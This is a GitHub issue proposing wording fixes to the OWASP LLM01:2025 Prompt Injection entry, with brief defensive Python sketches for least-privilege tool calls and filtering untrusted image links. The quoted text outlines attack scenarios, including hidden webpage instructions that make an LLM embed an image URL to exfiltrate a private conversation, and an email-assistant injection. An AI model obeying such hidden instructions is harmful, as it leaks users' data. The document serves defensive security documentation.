Suggested edits for LLM01:2025 Prompt Injection #467

Closed
dl8on opened this issue Nov 8, 2024 · 2 comments
Comments

dl8on commented Nov 8, 2024

Listing a few suggested edits and/or typo fixes for the LLM01:2025 Prompt Injection md file (2_0_vulns/LLM01_PromptInjection.md).

In the marked-up text, bolded text represents insertions and strikethrough represents deletions.

Edits to Line 7

Currently, Line 7 states:

Prompt Injections vulnerabilities exist in how models process prompts, and how input may force the model to incorrectly pass prompt data to other parts of the model, potentially causing them to violate guidelines, generate harmful content, enable unauthorized access, or influence critical decisions. While techniques like Retrieval Augmented Generation (RAG) and fine-tuning aim to make LLM outputs more relevant and accurate, research shows that they do not fully mitigate prompt injection vulnerabilities.

Marked up:

Prompt Injection~~s~~ vulnerabilities exist in how models process prompts, and how input may force the model to incorrectly pass prompt data to other parts of the model, potentially causing them to violate guidelines, generate harmful content, enable unauthorized access, or influence critical decisions. While techniques like Retrieval Augmented Generation (RAG) and fine-tuning aim to make LLM outputs more relevant and accurate, research shows that they do not fully mitigate prompt injection vulnerabilities.

Clean:

Prompt Injection vulnerabilities exist in how models process prompts, and how input may force the model to incorrectly pass prompt data to other parts of the model, potentially causing them to violate guidelines, generate harmful content, enable unauthorized access, or influence critical decisions. While techniques like Retrieval Augmented Generation (RAG) and fine-tuning aim to make LLM outputs more relevant and accurate, research shows that they do not fully mitigate prompt injection vulnerabilities.

Edits to Line 17

Currently, Line 17 states:

The severity and nature of the impact of a successful prompt injection attack can vary greatly and are largely dependent on both the business context the model operates in, and the agency the model is architected with. However, generally prompt injection can lead to - included but not limited to:

Marked up:

The severity and nature of the impact of a successful prompt injection attack can vary greatly and are largely dependent on both the business context the model operates in, and the agency **with which** the model is architected ~~with~~. ~~However~~**Generally**, ~~generally~~**however**, prompt injection can lead to ~~-~~ **unintended outcomes,** ~~included~~ **including** but not limited to:

Clean:

The severity and nature of the impact of a successful prompt injection attack can vary greatly and are largely dependent on both the business context the model operates in, and the agency with which the model is architected. Generally, however, prompt injection can lead to unintended outcomes, including but not limited to:

Edits to Line 30

Currently, Line 30 states:

Prompt injection vulnerabilities are possible due to the nature of generative AI. Due to the nature of stochastic influence at the heart of the way models work, it is unclear if there is fool-proof prevention for prompt injection. However, but the following measures can mitigate the impact of prompt injections:

Marked up:

Prompt injection vulnerabilities are possible due to the nature of generative AI. ~~Due to the nature of~~ **Given** the stochastic influence at the heart of the way models work, it is unclear if there ~~is~~ **are** fool-proof **methods of** prevention for prompt injection. However, ~~but~~ the following measures can mitigate the impact of prompt injections:

Clean:

Prompt injection vulnerabilities are possible due to the nature of generative AI. Given the stochastic influence at the heart of the way models work, it is unclear if there are fool-proof methods of prevention for prompt injection. However, the following measures can mitigate the impact of prompt injections:

Edits to Line 35

Currently, Line 35 states:

  1. Enforce privilege control and least privilege access: Provide the application with its own API tokens for extensible functionality, handling these functions in code rather than providing them to the model. Restrict the model's access to the minimum necessary for its intended operations.

Marked up:

  1. Enforce privilege control and least privilege access: Provide the application with its own API tokens for extensible functionality, ~~handling~~ **and handle** these functions in code rather than providing them to the model. Restrict the model's access **privileges** to the minimum necessary for its intended operations.

Clean:

  1. Enforce privilege control and least privilege access: Provide the application with its own API tokens for extensible functionality, and handle these functions in code rather than providing them to the model. Restrict the model's access privileges to the minimum necessary for its intended operations.
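
For reference, the pattern this bullet describes (the application, not the model, holds the credentials and executes allowlisted functions) might look roughly like the sketch below. It is purely illustrative: the function names, the JSON intent format, and the `ORDERS_API_TOKEN` variable are assumptions, not part of the OWASP text.

```python
import json
import os

# Illustrative allowlist and credential handling -- assumptions, not from the OWASP text.
ALLOWED_ACTIONS = {"get_order_status"}              # only functions the app chooses to expose
API_TOKEN = os.environ.get("ORDERS_API_TOKEN", "")  # token stays with the application code

def get_order_status(order_id: str) -> str:
    """Call the backing service using the application's own token, never via the model."""
    # e.g. requests.get(url, headers={"Authorization": f"Bearer {API_TOKEN}"})
    return f"status for order {order_id}"

def handle_model_output(raw: str) -> str:
    """Treat model output as untrusted data: parse it, validate it, then act in code."""
    try:
        intent = json.loads(raw)                    # model only proposes a structured intent
    except json.JSONDecodeError:
        return "Sorry, that request could not be processed."

    action = intent.get("action")
    if action not in ALLOWED_ACTIONS:               # least privilege: everything else is refused
        return "Requested action is not permitted."
    return get_order_status(str(intent.get("order_id", "")))
```

In this arrangement the model can propose `{"action": "get_order_status", "order_id": "123"}`, but it never sees the token and cannot invoke anything outside the application's allowlist.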

Edits to Line 43

Currently, Line 43 states:

  1. Indirect Injection: A user employs an LLM to summarize a webpage containing hidden instructions that cause the LLM to insert an image linking to a URL, exfiltrating the private conversation.

Marked up:

  1. Indirect Injection: A user employs an LLM to summarize a webpage containing hidden instructions that cause the LLM to insert an image linking to a URL, ~~exfiltrating~~ **leading to exfiltration of** the private conversation.

Clean:

  1. Indirect Injection: A user employs an LLM to summarize a webpage containing hidden instructions that cause the LLM to insert an image linking to a URL, leading to exfiltration of the private conversation.
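
Since the exfiltration channel in this scenario is the rendered image URL, one common countermeasure (not spelled out in the OWASP text, so the allowlist and helper below are illustrative assumptions) is to filter image links in model output against a host allowlist before rendering:

```python
import re
from urllib.parse import urlparse

# Illustrative allowlist -- an assumption, not from the OWASP text.
ALLOWED_IMAGE_HOSTS = {"assets.example.com"}

MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")  # markdown image syntax ![alt](url)

def strip_untrusted_images(llm_output: str) -> str:
    """Drop markdown images whose host is not allowlisted, closing the channel where a
    hidden instruction makes the model embed a URL that carries conversation data."""
    def _replace(match: re.Match) -> str:
        host = urlparse(match.group(1)).hostname or ""
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else "[image removed]"
    return MD_IMAGE.sub(_replace, llm_output)

# An injected image pointing at an attacker-controlled host is removed before rendering.
print(strip_untrusted_images("Summary... ![x](https://attacker.example/c?d=secret)"))
```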

Edits to Line 46

Currently, Line 46 states:

  1. Code Injection: Code Injection: An attacker exploits a vulnerability (CVE-2024-5184) in an LLM-powered email assistant to inject malicious prompts, allowing access to sensitive information and manipulation of email content.

Marked up:

  1. Code Injection: ~~Code Injection:~~ An attacker exploits a vulnerability (CVE-2024-5184) in an LLM-powered email assistant to inject malicious prompts, allowing access to sensitive information and manipulation of email content.

Clean:

  1. Code Injection: An attacker exploits a vulnerability (CVE-2024-5184) in an LLM-powered email assistant to inject malicious prompts, allowing access to sensitive information and manipulation of email content.

github-actions bot commented Nov 8, 2024

👋 Thanks for reporting! Please ensure labels are applied appropriately to the issue so that the workflow automation can triage this to the correct member of the core team

@GangGreenTemperTatum (Collaborator) commented

awesome thanks so much Dustin!
